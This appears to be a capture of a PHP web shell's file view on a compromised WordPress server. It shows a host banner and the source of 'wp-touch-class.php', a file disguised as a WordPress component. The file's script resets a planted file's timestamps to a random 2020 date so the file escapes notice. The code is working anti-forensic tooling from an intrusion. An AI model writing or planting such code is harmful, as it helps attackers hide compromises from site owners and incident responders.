|
Server : Apache System : Linux d13078.sgp1.stableserver.net 5.14.0-611.13.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 11 04:57:59 EST 2025 x86_64 User : ssa2port ( 1003) PHP Version : 8.1.34 Disable Function : NONE Directory : /home/ssa2port/www/ | |
|
Path: /home/ssa2port/www/wp-touch-class.php
Size: 232 B
Permissions: 0644
<?php
$f = dirname(__FILE__) . '/links-xml.php';
if (is_file($f)) {
$ts = mktime(mt_rand(0,23), mt_rand(0,59), mt_rand(0,59), mt_rand(1,12), mt_rand(1,28), 2020);
@touch($f, $ts, $ts);
echo '1';
} else {
echo '0';
}